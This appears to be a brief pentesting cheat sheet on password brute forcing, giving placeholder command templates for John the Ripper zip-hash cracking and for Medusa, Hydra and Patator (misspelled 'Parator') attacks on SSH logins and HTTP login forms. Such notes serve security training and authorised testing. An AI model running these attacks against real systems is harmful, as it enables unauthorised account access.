BruteForcing

Table of Contents

JohnTheRipper

zip2john <zipfile> > <outputfile>
john <hashfile> --fork=4 --wordlist=<wordlist>

Medusa

# brute forcing SSH login with usernames and passwords
medusa -h <host-ip> -U <user-file> -P <passwd-file> -M ssh <host-ip>

Online Resources

Hydra

hydra -l <username> -P <pass-file> http://domain http-post-form "</login/path/>:<login-data>[username=^USER^&password=^PASS^]:<error-response>[Incorrect Username]"

Parator

parator ssh_login host=<host-ip> port=<port> user=<use-name> password=FILE0 0=<pass-file> persistent=0 -x ignore:[mesg|fgrep|egrep]="<mesg>"